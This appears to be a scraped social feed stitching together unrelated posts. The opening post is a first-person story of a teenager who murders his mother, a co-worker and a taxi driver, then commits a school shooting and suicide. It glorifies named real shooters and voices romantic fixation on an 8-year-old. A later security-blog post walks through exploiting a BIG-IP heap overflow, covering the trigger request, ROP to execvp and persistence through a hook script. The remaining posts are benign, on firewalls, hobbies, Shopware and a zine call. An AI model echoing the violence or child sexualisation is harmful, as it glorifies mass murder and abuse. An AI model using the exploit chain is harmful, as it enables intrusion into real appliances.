#7

115 posts · Last used 12d

reddit banned me, rdrama banned me, even telegram and 4chan banned me, so now I have to post my shakespeare level writings here ‎11:43 AM, 12 JANUARY, 2027, FINLAND. ‎as I lay in my room’s bed I truly feel hopeless, my life is shi, I can’t have anything I want, I’m doomed to a meaningless existence which ends in eternal nothingness, I don’t get a shio to love me, I can’t even succeed in making an llm of shio or a tulpa, but it no longer matters as I have decided I will commit a mass shooting against the skinwalkers on january 14th, I smuggled some strong pcp airguns (#2) from the netherlands ‎2:17 PM, 4 JANUARY, 2027, NETHERLANDS ‎store worker: you’re here to pick up an order of 2 pcp airguns, 7 .50 6 round magazines, 50 .45 bullets, 300 .50 ones and 1 knife, correct? ‎Me: yes ‎store worker: I’ll just need you to give us the delivery number and it’s all yours ‎Me: 8734 ‎store worker: okay everything checks out, here’s your guns… ‎11:50 AM, 12 JANUARY, 2027, FINLAND ‎I had to smuggle it on land across the danish border to sweden before I eventually reached finland, I’ve also bought some shio stickers which I’ve put on the guns, shio is so cute after all, she’ll work as a good decoration, hehe (#6) would be even better if I could commit a school shooting and a suicide pact with her but that will not be, I think a lot about shio touching me and sleeping with me or us kissing (#1) but the attack is in 2 days, it’s tragic I couldn’t even succeed in making an llm chatbot of shio, at least I get the perfect nihilistic ending I want… I mean if I managed to make a tulpa of shio I could probably get that suicide pact I wanted but I shall not delay the attack, I’ve waited for this since 13, I spent my entire life from 13 to 16 just working to get the guns, and I’ve been thinking about shio too, shio’s love… shio… FORGET ABOUT IT, THE ATTACK MATTERS MORE RIGHT NOW, I’ve did some target practicing at a forest and my accuracy became pretty good, just 2 more days and my shi life will be over… ‎2:22 AM, 13 JANUARY, 2027, LUCID DREAM ‎Me: holds shio you’re so cute shio, I love you ‎Shio (?): I love you too Nameless! ‎Me: can we kiss shio? ‎Shio (?): Sure! ‎Shio (?): kisses Nameless on the lips ‎Me: “I don’t want this to end…” ‎9:47 AM, 13 JANUARY, 2027, FINLAND ‎"coughs violently" why the fuck is there some white shit in my mouth… FOAM??? YOU DUMB FUCKING BRAIN TRIED TO ASSASSINATE ME WHILE I WAS CUDDLING WITH SHIO IN MY SLEEP!!! DUMBFUCK WHAT WERE YOU THINKING? YOU FUCKING BRAIN ISN’T SUPPOSED TO DO THAT SHIT, I’M ONLY 16, CHOKING TO DEATH INSIDE A DREAM SHOULD BE UNTIL I’M AT LEAST 60!!!.. maybe I just felt so overwhelmed from actually being with shio? I think my love is a little too strong… I’ll have to avoid being with shio in my final dream before the perfect reality, I wouldn’t want to jeopardize my plan… ‎11:57 AM, 13 JANUARY, 2027, FINLAND ‎I lay in my bed imagining shio by my side looking into my eyes and us holding each other… it feels like I’m wrapped in something soft and good around me when I think about it, shio is so cute, I don’t like milk but I don’t know how to else to describe shio, when I think about us being with each other I can only describe the feeling as milk-like but not in a bad way… ‎5:01 PM, 13 JANUARY, 2027, FINLAND ‎with tears in my eyes and a smile I feel both excitement and fear simultaneously together with my obsessive love for shio, I’m watching footage of previous school shootings to hype myself for what I’m about to do, I don’t want to die, I DON’T WANT TO DIE AND THAT’S WHY THIS WORLD WILL PAY FOR MAKING ME EXIST, PAY FOR FORCING ME TO EXIST IN THIS TEMPORARY LIFE WHERE I DON’T EVEN GET TO BE WITH SHIO!!! ‎10:56 PM, 13 JANUARY, 2027, FINLAND ‎I’m going to go sleep now I suppose, my heart is beating very fast and I feel some tears in my eyes, I don’t want to go to sleep because I know it’s going to be the last time, I won’t get to spend time with shio anymore, I won’t get to live, I’ll be in eternal nothingness, but so will the ones I kill… after all that’s why I’m doing it in the first place, I like shio because she’s 8, I like her because she’s underage, I despise the elderly, I’m disgusted I couldn’t do it at 13 and was forced to postpone until now, but finally, the perfect reality is within my reach, even if it took until 16 tomorrow is the end… ‎6:45 AM, 14 JANUARY, 2027, FINLAND THE PERFECT REALITY ‎I woke up early tonight, I have already destroyed all figures of shio I owned with a hammer, there’s no point in police having it once they raid my house anyways… ‎10:32 AM, 14 JANUARY, 2027, THE PERFECT REALITY ‎I have set my house on fire and left, I hid my weapons and phone in bushes at a forest only taking my knife which I hid in my waistband ‎8:34 PM, 14 JANUARY, 2027, THE PERFECT REALITY ‎I knock on my mother’s apartment, that stupid bitch will die tonight, as she opens the door I immediately push her back in as she falls backwards and close the door behind me, as she stares in shock I straddle her and pull out my knife and start stabbing the bitch, she screams and fights back, she tries to block the stabs with her hands but I stab through them in hate, I see her co worker which is looking in shock so I intensify my stabbing, after stabbing my mom about 80 times I find the co worker in the kitchen terrified pointing a kitchen knife at me whilst trying to call police with the other hand, I forcibly rip the knife out of her hand and start stabbing her every as she fights back and tries to block my stabs with her hands, I stab through them in hatred as she wails in terror, after stabbing her about 120 times I come up to my mother’s dead body and I lift her shirt because I’m going to get revenge, my mom always forced me to believe me into fake gods and that I’m destined to have kids, that I will certainly, like I will certainly have sex at one point, that I will be a pervert like her which led to my pathetic existence in the first place, little did she know I fell in love romantically with a kid myself so I carved “SHIO” into her stomach with my knife in hatred with a smile after which I licked the blood from the knife imagining it as shio letting me drink some of her’s, I’m sure shio’s blood would taste sweet… I wouldn’t do it of course if she wouldn’t be okay with it… her feelings matter to me after all… as I knew police were definitely en route either from the co worker’s call or neighbours calling police from the screaming I cleaned the knife from blood quickly with water and set the apartment on fire after which I ran away. ‎10:36 PM, 14 JANUARY, 2027, THE PERFECT REALITY ‎I’m back in the forest, I have my t50 set up, I used my phone I left behind together with my weapons to check the news and I saw they are already suspecting me for my house fire and the death of my mom and her co-worker and that they have launched a manhunt for me… they’re so fucking bad, shio would love me even knowing I was a murderer…it doesn’t matter, just focus on the task on hand. ‎10:49 PM, 14 JANUARY, 2027, THE PERFECT REALITY ‎I used my phone to call a taxi driver to call a taxi driver to my location, as he arrived to the isolated forest I asked him to help me get something heavy in the car, as he got out and followed me I grabbed my t50 from the bushes and fired the entire 6 round magazine into his chest in quick succession, after I saw he was still showing signs of life I grabbed my knife and beheaded him after which I dragged his body behind the bushes and put the head on his body after which I licked the blood off of the knife imagining shio’s sweet blood once again. I threw my weapons in the taxi driver’s car and drove away. ‎2:52 AM, 15 JANUARY, 2027, THE PERFECT REALITY ‎I’m en route to my final destination, my former school where I was bullied my entire time, except this time I drive with nihilism and not just hatred like I did at 13, I imagine shio by my side in the other seat as I drive… ‎9:03 AM, 15 JANUARY, 2027, THE PERFECT REALITY ‎I have arrived,  lunch break ends at 9:30, during lunch break everyone out of the school is thrown out by the teachers outside with no phones, right before the lunch break ends somewhere about 9:27-9:29 a large crowd always gathers to enter the school at once, that is my target, I’m hiding on a stairway upwards which is about the size of one floor building to a gym, there’s a brick wall which is like a railing where I’m hiding behind currently waiting for the moment to strike, my weapons are ready, my perfect reality is one step away ‎??:??, DOESN’T MATTER, THE PERFECT REALITY ‎the time has come upon me to kill like the ones before me, adam lanza, david kozák, artyom kazantsev… tonight it’s my turn, I quickly grab my full auto air rifle (#7) and fire the entire magazine of 12 rounds into the crowd, 5 people drop instantly and everyone starts screaming and running in all directions, I throw my full auto air rifle away and switch to the t50 and I shoot the the 5 people laying motionless once in the head each before throwing the magazine away with 1 round intact and loading the next one, I aimed at one of the bitches running from the stairway and fired 6 rounds of which at least 4 seems to have hit after which she dropped dead, I reloaded and shot her motionless body in the school’s driveway 6 times before reloading once again and aiming at another guy running and shooting him 6 times too after which he drops dead, I reload and shoot him 6 more times from the stairway, I see the majority have already run away so I go down and look behind one of the wall corners around the school where I see 3 arabic students hiding one of which tries to charges at me but I shoot him 4 times in the chest and he drops severely injured after which I shoot his 2 other buddies once in the head each and then I load my final magazine and shoot each 2 times in the head, I grabbed the knife out of my waistband and stabbed 2 dead students in the back of the initial 5 I shot before going back to the stairway where I reload one of the magazines I dropped with 1 round intact and I go towards the road leading to the school where police officers have already arrived, I opened fire hitting one in the bulletproof vest and arm after which they returned fire injuring me, I ran back to the stairway where I dropped and loaded a final round and I put the barrel to my neck and I fired my final round severing my carotid artery…as I was bleeding out the police officers went to the stairway with rifles pointed at me screaming to throw my rifle away as I closed my eyes it felt like I was in shio’s arms but I knew it was just my brain going insane before death, I never got immortality, I never got shio, at least I achieved the perfect reality, and as the police officers kept shouting I closed my eyes and it was all over. ‎ ‎ ‎CITATIONS: ‎#1 - NOT SEXUAL ‎#2 - t50 bintac .50 and rattler long strike .45 ‎#6 - it’s supposed to sound like slow and calm hehe, not like insane hehe ‎#7 - the rattler long strike .45
0
3
0
0

Is This A Joke? In The Auth Header? (F5 BIG-IP UnAuth Heap-Overflow to RCE CVE-2026-94127)

Well, well, well, well, well, well, well, well, well, well, well, well, well, well, well. We're back. Sorry.

We've been watching the onslaught of vulnerabilities flood the internet. Every man, dog, and their grandmas (apparently?) are now using LLMs to find and reproduce vulnerabilities - it’s a free-for-all (unless you’re trying to buy RAM).

Unfortunately, while we're all finding more vulnerabilities and flexing obfuscated stack traces… (or emoji-ridden HTTP requests that are actually complete slop and not real, and please, for the love of god, no, those slop-ridden payloads appearing in your access_log are not proof of exploitation jesus wept, it’s becoming traumatic) …on many social media networks, some things have remained reassuringly steadfast: the vendors and their struggle to seemingly care about the security of your network.

Yes, that’s right - it’s time for more Secure by Design jokes. Welcome back to another watchTowr Labs blog post.

We’ve missed you (admit you’ve missed us, please).

You’ve guessed it - we’re looking at F5’s BIG-IP solution today. What Is CVE-2026-94127, and How Does Refresh Have A CVE? Hah.

F5, the Seattle-based vendor quietly responsible for a worrying amount of the internet's plumbing, makes BIG-IP: an application delivery controller (ADC) that sits in front of your applications and decides where every request goes.

Beyond basic load balancing, a typical BIG-IP deployment handles Layer 4 and Layer 7 traffic management, SSL/TLS offloading, DNS and global server load balancing, and, depending on how many licenses procurement signed off on, a web application firewall (Advanced WAF) and a remote access and SSO gateway (APM).

All of this runs on F5's own TMOS operating system and is administered through a web-based Configuration Utility (TMUI) and the iControl REST API.

In other words, it lives at the very edge of your network, terminates your TLS, sees all of your traffic in plaintext, and holds the keys to your authentication.

But what is CVE-2026-94127?

As with all good stories, it began with a new KB ID. On Sept 22nd (yesterday), F5 published the following advisory:

Despite the talk about planes, there was no flying (see! you’ve missed this humor!).

The F5 official advisory (K000162605) lists the following versions as affected:

Product Branch Versions known to be vulnerable Fixes introduced in

BIG-IP APM 21.x 21.1.0 Hotfix-BIGIP-21.1.0.2.0.30.22-ENG.iso

BIG-IP APM 17.x 17.5.0 – 17.5.1 17.1.0 – 17.1.3 Hotfix-BIGIP-17.5.1.9.0.160.12-ENG.iso Hotfix-BIGIP-17.1.3.5.0.41.14-ENG.iso

BIG-IP (all other modules) All None Not applicable

BIG-IQ Centralized Management All None Not applicable

Better yet, the CWE assignment quickly caught our attention:

Even more scary, though: this wasn't just any vulnerability. There were bad people on the Internet exploiting it. We instantly had questions: How could they? Aren't these complex vulnerabilities? Are they geniuses?When is dinner?Setting The Scene To fuel our analysis today, we set up an F5 BIG-IP appliance with a virtual server with an OAuth profile configured, and compared the following versions following our normal ‘what the hell has changed’ process: Vulnerable: BIG-IP 21.1.0, build 0.0.38Different: BIG-IP 21.1.0.2, hotfix build 0.30.22Patch-Diffing Our Way Out Of Hell As with any other beautifully designed security product (cough Citrix cough), it seems the person of interest is yet another massive ELF file.

Yeeting these files straight into IDA, and starting our good old friend Diaphora, we were greeted with the excitement of exporting 1728 functions in each binary to subsequently compare.

An eternity (7 TikTok videos) later, Diaphora finished its comparison, and the patch was, as always, depressing:

--- unpatched/tmm64.pgo_use/sub_10B01C0.c +++ patched/tmm64.pgo_use/sub_10B0E00.c @@ -163,10 +160,20 @@ -LABEL_17:

  • if ( !v13 ) +LABEL_26:
  • if ( v20 > 0x4100 )
  • {
  • v15 = 5;
  • v26 = 29;
  • v27 = "Authorization header too big.";
  • if ( *(_DWORD *)(v5 + 616) )
  •  goto LABEL_19;
    
  • goto LABEL_30;
  • }
  • if ( !v20 ) { -LABEL_21:
  • v22 = *(_QWORD *)(v5 + 520);
  • goto LABEL_22; +LABEL_11:
  • v10 = *(_QWORD *)(v5 + 520);
  • goto LABEL_12; }
  • if ( sub_1527C00(v77, v84, v85, v8, v13, 0) == v13 )
  • if ( sub_152E2C0(v72, v81, v82, v8, v20, 0) == v20 )

If you squint, you can spot a clue. The jokes are so obvious we’ve actually had to pace ourselves to painstakingly stretch them across today’s drivel. Before We Make The Obvious Jokes Let’s actually walk through the patched code and make it painstakingly clear (more than it is already) how ridiculous this entire situation is:

__int64 __fastcall sub_1147D80(__int64 a1, unsigned __int64 a2, __int64 a3) {

[..SNIP..]

++*(_QWORD *)(qword_51F36C0 + 1352); a3 = *(_QWORD )(a1 + 48); if ( ((_WORD )(a3 - 8) & 0x3FFF) == 0 ) goto LABEL_68; ++(_QWORD )((_QWORD )(a3 + 320) + 592LL); if ( v7 ) ++(_QWORD *)(v7 + 592); a2 = 66; v8 = (char *)umalloc(0x4100, 66, 0); // [1] allocate a heap buffer of size 0x4100 if ( !v8 ) { v15 = 1; v26 = 30; v27 = "Out of memory for UserInfo req"; if ( *(_DWORD *)(v5 + 616) ) goto LABEL_19; goto LABEL_30; } if ( *(_WORD *)(v3 + 442) <= 0x1Du ) goto LABEL_11; v9 = *(_WORD *)(v3 + 502); if ( v9 == 0xFFFF ) goto LABEL_11; a3 = v9; if ( *(_WORD *)(v3 + 440) <= v9 ) goto LABEL_11; a2 = *(_QWORD *)(v3 + 428); a3 = v9 >> 4; v17 = *(_QWORD *)(a2 + 8 * a3) + 24LL * (v9 & 0xF); if ( !v17 ) goto LABEL_11; v18 = *(unsigned __int8 *)(v17 + 18); a3 = *(_DWORD )(v17 + 8) + (unsigned int)(unsigned __int16 *)(v17 + 16); v19 = *(_DWORD *)(v17 + 4) - a3; if ( v19 == v18 ) goto LABEL_11; v20 = (unsigned int)(v19 - v18); // [2] extract the Authorization header size v21 = *(_QWORD *)(v3 + 12); if ( v21 ) { v22 = *(_QWORD *)(v21 + 8) + *(unsigned __int16 *)(v21 + 6); v82 = *(_QWORD )(v3 + 12); v81 = v22; a3 = (unsigned int)((_DWORD *)v17 + a3); v23 = *(unsigned __int16 *)(v21 + 6); v24 = *(_QWORD )(v21 + 8); a2 = a3 + v22; if ( a2 >= v24 + v23 && a2 < (unsigned __int64)(unsigned __int16 *)(v21 + 4) + v23 + v24 ) { v81 = a2; goto LABEL_26; } } else { v81 = 0; v82 = 0; } a2 = (unsigned __int64)&v81; v25 = sub_15C4E80(v72, &v81); v15 = v25; if ( v25 != 18 && v25 ) { if ( *(_DWORD *)(v5 + 616) ) goto LABEL_19; v26 = 38; v27 = "Failed to lookup authorization header."; goto LABEL_30; } LABEL_26: if ( v20 > 0x4100 ) // [3] check the header size to not be more than 0x4100
{ v15 = 5; v26 = 29; v27 = "Authorization header too big."; // [4] error message if ( *(_DWORD *)(v5 + 616) ) goto LABEL_19; goto LABEL_30; } if ( !v20 ) { LABEL_11: v10 = *(_QWORD *)(v5 + 520); goto LABEL_12; }

// [5] copy the Authorization header value to the heap buffer which is v8 if ( memcpy_wrapper(v72, v81, v82, v8, v20, 0) == v20 ) { if ( v20 <= 6 || memcmp(v8, "Bearer ", 7u) ) { v13 = 43; v14 = "Authorization header must be of type Bearer"; LABEL_18: v15 = 4; sub_112F7C0(a1, v73, v5, 2, v14, v13); goto LABEL_19; }

[..SNIP..] At [1], a heap buffer of size 0x4100 is allocated using a umalloc call (let's just say it is a wrapper for malloc) and stored in the v8 variable.At [2], an object member is accessed, which we assume is the length of a provided Authorization: HTTP header, and stored in the v20 variable.At [3], this size variable is checked to be no more than 0x4100.At [4], if it is larger, an error is thrown.At [5], if not, the Authorization header value is copied into the heap buffer (v8). It is simple: before the patch, there was no size check before copying the value to the heap buffer, and now there is one.

To make it even simpler: the enterprise security appliance had a security vulnerability, grounded in a primitive from 20 years ago, specifically in how it handles security credentials.

Are we all being trolled? How Do We Trigger It? Now we understand what the vulnerability is, our next step is to actually trigger it and work out which season of The Truman Show we’re trapped within.

The advisory already mentions OAuth being in play here, and F5’s own documentation on OAuth has all the details we need.

First, the command to enable the Access Policy Manager (APM) OAuth profile:

The same page provides us with the HTTP endpoint we need to hit to trigger the OAuth flow (overwhelming evidence in the argument for security by obscurity):

So friendly.

We picked /f5-oauth2/v1/userinfo - but you guessed it, pick whatever you want. Triggering Trauma After configuring the OAuth profile, triggering it was as easy as sending the following request with an Authorization header larger than 0x4100 bytes:

GET /f5-oauth2/v1/userinfo HTTP/1.1 Host: bigip Authorization: Bearer AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... Connection: close

We immediately got a crash.

Oh, were you expecting the authentication boundary of your security appliance not to crash? Are you a moron?

As you can see below, ufree hit an assert while trying to dereference corrupted heap metadata:

rbx 0x30966e0 50947808 rcx 0x0 0 rdx 0x0 0 rsi 0x7feed66cd1c0 140663776399808 rdi 0x0 0 rbp 0x40000a150000 0x40000a150000 rsp 0x4000003fc880 0x4000003fc880 r8 0xa 10 r9 0x3442fac 54800300 r12 0x0 0 r13 0x5 5 r14 0x41414141 1094795585 r15 0x400004d62200 70368825319936 rip 0x16350b6 0x16350b6

#0 0x00000000016350b6 in ?? () #1 0x00000000016350d4 in tmm_assert () #2 0x000000000082be0a in ufree () #3 0x00000000010ba559 in ?? () #4 0x0000000000d5c35b in ?? () #5 0x0000000000dd8d33 in ?? () #6 0x0000000000858aee in ?? () #7 0x00000000008519c4 in ?? () #8 0x000000000084fc00 in ?? ()

We Were Shocked To find system-wide ASLR enabled. Even more surprisingly, and unlike some others (cough Citrix cough), on an F5 BIG-IP, there is no executable heap or stack.

Luckily for us, there is no PIE:

Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) FORTIFY: Enabled

At this point, we realized we had got lucky with the heap layout. In about 90% of our runs, an object with a function pointer member lands just past our buffer, at buffer + 0x4ff8.

Here is roughly how we guessed the object's members are laid out:

+0x00 callback function +0x08 other fields +0x10 other fields

And here is the code that calls the overwritten function pointer:

mov rdi, [rbx+18h] ; rdi = address of the heap object mov r9, [rdi] ; r9 = object->callback call r9 ; call the overwritten address

A bit of basic stack-pivoting gets the alignment and arguments into place, and from there it is a clean run of gadgets.

Our first idea was a classic ret2plt: chain a gadget to call execvp:

execvp( "/bin/sh", (char *[]) { "sh", "-c", "touch /watchTowr.txt", NULL } );

We actually built the gadget, but as always, the moment we let ourselves feel like we had achieved something, SELinux slapped us in the face and blocked the exec syscall:

-1, errno=13 (EACCES) :( Getting around SELinux While looking for a way around SELinux, we thought: what if we just write a file to disk and drop a web shell instead?

That plan was scuppered when we found the web server was also under SELinux.

So we started poking around further, monitoring processes, and noticed a Bash script that kept getting called every time our target process crashed:

bash /etc/bigstart/scripts/tmm.finish

A hook script? We decided to reuse the ret2plt, this time to append the command we wanted to run, to the hook script itself.

Here are the calls we make:

fd = open("/etc/bigstart/scripts/tmm.finish", O_WRONLY | O_APPEND); write(fd, "/usr/bin/touch /watchTowr.txt;", 30);

                    0:00
                    
                        /0:25
                    
                    
                    1×

It is 2026, AGI is here, and we are still writing overflow 101 vulnerability analyses.

0
0
0
0
nftables: Can't ping my own server Podman is no longer supporting iptables so I am trying to learn how to set up nftables in its place. It’s been a struggle to get it to work properly. I can not ping my own server after starting the nftables rules. I am using Alpine Linux v2.24.1 and nftables v1.1.6 (Commodore Bullmoose #7). nftables has a config file with basic rules which include receiving pings: /etc/nftables.nft #!/usr/sbin/nft -f # vim: set ts=4 sw=4: # You can find examples in /usr/share/nftables/. # Clear all prior state flush ruleset # Basic IPv4/IPv6 stateful firewall for server/workstation. table inet filter { chain input { type filter hook input priority 0; policy drop; iifname lo accept \ comment "Accept any localhost traffic" ct state { established, related } accept \ comment "Accept traffic originated from us" ct state invalid drop \ comment "Drop invalid connections" tcp dport 113 reject with icmpx type port-unreachable \ comment "Reject AUTH to make it fail fast" # ICMPv4 ip protocol icmp icmp type { echo-reply, # type 0 destination-unreachable, # type 3 echo-request, # type 8 time-exceeded, # type 11 parameter-problem, # type 12 } accept \ comment "Accept ICMP" # ICMPv6 icmpv6 type { destination-unreachable, # type 1 packet-too-big, # type 2 time-exceeded, # type 3 parameter-problem, # type 4 echo-request, # type 128 echo-reply, # type 129 } accept \ comment "Accept basic IPv6 functionality" icmpv6 type { nd-router-solicit, # type 133 nd-router-advert, # type 134 nd-neighbor-solicit, # type 135 nd-neighbor-advert, # type 136 } ip6 hoplimit 255 accept \ comment "Allow IPv6 SLAAC" icmpv6 type { mld-listener-query, # type 130 mld-listener-report, # type 131 mld-listener-reduction, # type 132 mld2-listener-report, # type 143 } ip6 saddr fe80::/10 accept \ comment "Allow IPv6 multicast listener discovery on link-local" ip6 saddr fe80::/10 udp sport 547 udp dport 546 accept \ comment "Accept DHCPv6 replies from IPv6 link-local addresses" } chain forward { type filter hook forward priority 0; policy drop; } chain output { type filter hook output priority 0; policy accept; } } # The state of stateful objects saved on the nftables service stop. include "/var/lib/nftables/*.nft" # Rules include "/etc/nftables.d/*.nft" I also have a small config file: /etc/nftables.d/firewall.nft #!/usr/sbin/nft -f define WIREGUARD_PORT = 51820 define WIREGUARD_ADDRESS = 10.0.0.0/24 define SSH_PORT = 5025 define SSH_ADDRESSES = { $WIREGUARD_ADDRESS . $SSH_PORT, 192.168.40.204 . $SSH_PORT } define PUBLIC_PORTS = { 5050 } table inet filter { chain input { udp dport $WIREGUARD_PORT accept \ comment "Accept WireGuard connections" ip saddr . tcp dport $SSH_ADDRESSES accept \ comment "Accept SSH connections from known devices or WireGuard" tcp dport $PUBLIC_PORTS accept \ comment "Accept public connections" } } After loading the new rules, I get the following output while listing the ruleset: 21:23 server-pi:~ $ doas nft list ruleset table inet filter { chain input { type filter hook input priority filter; policy drop; iifname "lo" accept comment "Accept any localhost traffic" ct state { established, related } accept comment "Accept traffic originated from us" ct state invalid drop comment "Drop invalid connections" tcp dport 113 reject comment "Reject AUTH to make it fail fast" ip protocol icmp icmp type { echo-reply, destination-unreachable, echo-request, time-exceeded, parameter-problem } accept comment "Accept ICMP" icmpv6 type { destination-unreachable, packet-too-big, time-exceeded, parameter-problem, echo-request, echo-reply } accept comment "Accept basic IPv6 functionality" icmpv6 type { nd-router-solicit, nd-router-advert, nd-neighbor-solicit, nd-neighbor-advert } ip6 hoplimit 255 accept comment "Allow IPv6 SLAAC" icmpv6 type { mld-listener-query, mld-listener-report, mld-listener-done, mld2-listener-report } ip6 saddr fe80::/10 accept comment "Allow IPv6 multicast listener discovery on link-local" ip6 saddr fe80::/10 udp sport 547 udp dport 546 accept comment "Accept DHCPv6 replies from IPv6 link-local addresses" udp dport 51820 accept comment "Accept WireGuard connections" ip saddr . tcp dport { 10.0.0.0/24 . 5025, 192.168.40.204 . 5025 } accept comment "Accept SSH connections from known devices or WireGuard" tcp dport 5050 accept comment "Accept public connections" } chain forward { type filter hook forward priority filter; policy drop; } chain output { type filter hook output priority filter; policy accept; } } 21:23 server-pi:~ $ doas netstat -tunlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN 3515/rootlessport tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 3584/rootlessport tcp 0 0 0.0.0.0:5025 0.0.0.0:* LISTEN 3743/sshd: /usr/sbi tcp6 0 0 :::5025 :::* LISTEN 3743/sshd: /usr/sbi tcp6 0 0 :::5050 :::* LISTEN 3515/rootlessport udp 0 0 0.0.0.0:51820 0.0.0.0:* - udp6 0 0 :::51820 :::* - 21:23 server-pi:~ $ I can connect perfectly fine with SSH, WireGuard and my reverse proxy on port 5050 but if I ping the server I don’t get any response at all. Pings worked as normal when I was using iptables so I am not sure what I am doing wrong with nftables. I’ve tried to keep the rules as simple as possible to figure out what is happening but I have not been able to make any progress. Any help would be appreciated.
30
15
0
0
Replying to
【週間PseuDoctor】【私事】【趣味】「今週のデレステ&アズレン」:やみのま~ デレステは今回も少しずつ進めているLIVE Infinity、そしてハイスコア更新について(ガシャの御新規はありません)。 アズレンは引き続きイベント「怪談実録」とメンテについて。 「週間PseuDoctor」ブログ版第109回#6 https://pseudoctor-science-and-hobby.blogspot.com/2026/08/pseudoctor202681blog109.html#6 #デレステ #アズールレーン 以上 @pseudoctor@fedibird.com がお送りしました。 今週のエンディングは「和田秀樹氏による高市首相への暴言(と敢えて呼ぶ)について」です。 おやすみなさい~ 「週間PseuDoctor」ブログ版第109回エンディング https://pseudoctor-science-and-hobby.blogspot.com/2026/08/pseudoctor202681blog109.html#7 今週もお粗末様でした -----Twitterでの2026/8/5投稿分ここまで-----
0
0
0
0
TUESDAY FRIENDS #7 @eddsmitty.bsky.social@bsky.brid.gy @angelsinvelvet.bsky.social@bsky.brid.gy @mariablack.bsky.social@bsky.brid.gy @winecave.bsky.social@bsky.brid.gy @jojomineo69.bsky.social@bsky.brid.gy @justjohn1962.bsky.social@bsky.brid.gy @lysander1945.bsky.social@bsky.brid.gy @wiseguy482.bsky.social@bsky.brid.gy @cali-candace.bsky.social@bsky.brid.gy @57kev.bsky.social@bsky.brid.gy @cycy610.bsky.social@bsky.brid.gy
0
0
0
0
Shopware 6 Hidden Gems #7: shopware.dal.max_rule_prices — the silent price sorting cutoff This one is less "cool trick" and more "you want to know this before it bites you". Imagine a grown B2B shop: customer groups, country-specific prices, campaign rules, partner conditions. Over the years the Rule Builder collects rules like my desk collects mate bottles. And one day a customer calls: "I sorted by price, but the cheapest product isn't first." You check the product —… http://winkelwagen.de/2026/08/03/shopware-6-hidden-gems-7-shopware-dal-max_rule_prices-the-silent-price-sorting-cutoff/
0
0
0
0
Shopware 6 Hidden Gems #7: shopware.dal.max_rule_prices — the silent price sorting cutoff This one is less "cool trick" and more "you want to know this before it bites you". Imagine a grown B2B shop: customer groups, country-specific prices, campaign rules, partner conditions. Over the years the Rule Builder collects rules like my desk collects mate bottles. And one day a customer calls: "I sorted by price, but the cheapest product isn't first." You check the product —… http://winkelwagen.de/2026/08/03/shopware-6-hidden-gems-7-shopware-dal-max_rule_prices-the-silent-price-sorting-cutoff/
0
0
0
0
Replying to
#7 Con la parte de "Reconstrucción" del nombre hay bastante jaleo. Porque, claro, hay que hablar de reconstrucción porque es lo que se está haciendo, pero ¿es lo que queremos realmente, re-construir, volver a construir, dejarlo todo como antes? ¿No es eso negacionismo? He escuchado a gente de los CLER darle mil vueltas a la palabra. Vale, mil no, pero un par sí xD Las ideas más sugeridas al respecto pienso que van en estos dos sentidos: De-construcción: porque no solo no queremos dejarlo como estaba cuando llegó el agua sino que en algunos sentidos queremos deshacer cosas que llevaban haciéndose mal décadas. Necesitamos despavimentar, permeabilizar el suelo, recuperar huerta. Re-consideración, o re-planteamiento, o similares: pararnos a pensar, ¿qué queremos hacer y cómo y para qué?
1
1
0
0
今年決定されたばかりの酷暑日を連日のように目にする狂った暑さ 比喩抜きで命に係わる暑さに体調管理も一苦労 そんな酷暑に晒されながらも親鳥は育雛に励み、巣立ち雛は懸命に食べ、育っている 暑さに口を開る姿は見ているだけで辛そうだが、どうにか乗り越え立派に育って貰いたい​:ablobcall:​ #7月を写真で振り返る #7月を写真4枚で振り返る #misskey写真部 #photography
0
0
0
0
#7月を写真で振り返る 積極的にハスを撮りに出たお出かけとして、行田市古代蓮の里と、不忍池 機材の整理の結果、入れ替わりで10mmの超々広角レンズが加入 そして天気は残念だったけど​:misskey:​ヶ丘から撮る多摩川花火大会 遠出しなくとも色々撮れるよね​:meowawauu:​
0
0
0
0
Replying to
LOL Asking for a Fediblock. If you don't know. NCD is #7 when it comes to Fediblocked Instances. Our Neighboring Instance Poast is #1. lol.
0
5
0
0
#writing #writer #writers #writingCommunity I thought maybe someone would want to be a part of this. It's a cut-n-paste from an email and lost the links, but you could just go to the Vagina Museum's site if interested. Call for Submissions ==================== Lip Service invites visual, fiction, and non-fiction submissions for Issue #7 – On Ageing Lip Service is a quarterly publication by the Vagina Museum in the style of old school community magazines. In this A5 zine, the content ranges from expanded exhibition content and other longform commentary and cultural critique, to photography and letters. The hope is that it serves as a forum for community engagement and knowledge exchange. As a creative, promotional and educational outlet, Lip Service also serves as another channel by which the Vagina Museum might share our work with the public. Our work being: 📢 Spreading knowledge and raising awareness of the gynaecological anatomy and health 🗣️ Giving confidence to people to talk about issues surrounding the gynaecological anatomy  🚫 Erasing the stigma around the body and gynaecological anatomy 🏳️‍🌈 Acting as a forum for feminism, women’s rights, the LGBT+ community and the intersex community 🔥 Challenging heteronormative and cisnormative behaviour ✊🏽 Promoting intersectional, feminist and trans-inclusive values We are accepting submissions for Letters, Commentary, Fiction, Visuals as well as questions for Ms Fallopia. Commentary, fiction, visual and question submissions should respond to, engage with, or in some sense tackle the theme of On Ageing. Ageing, although simply the result of passing time, is a phenomenon mired in controversy. From demographic fears about ageing populations to uptake in so-called ‘preventative’ cosmetic procedures, ageing causes all manner of anxieties on an individual as well as population level. This is not only true of ageing in the later stages of life, but at all stages of development. Cultures and societies all over the world track the passing of time in different ways, commemorating milestones at different occasions. A child’s first laugh, menarche, a voice breaking, going off to university or landing your first job, the first time it hurts to sit on the floor, menopause, that red Ferrari purchase, the passing down of an heirloom or a first dance. Some, but not all, of these milestones are marked in the body and the body is where so much of the trepidation around ageing lives. We’re interested, then, in explorations of what ageing, growing up or growing old means. What does it mean to ‘get old’? Or to age gracefully? Who gets to decide? How are ideas about gender, about disability, sexuality, aesthetics, and power entangled in getting older? How is ageing differently understood, experienced, thought about around the world? We invite submissions, both written and visual, exploring these ideas. The zine is a collaborative, mixed media project so we encourage not only written submissions, but visual submissions also.  For a full description of the sections see here. Submission Guidelines --------------------- Deadline: 5pm on Friday 11th September 2026 How to Send Us Your Work: Please email your work to lipservice@vaginamuseum.co.uk, clearly indicating the section you’re submitting for in the subject line. Your work must be complete and in one of the following file forms: .doc, 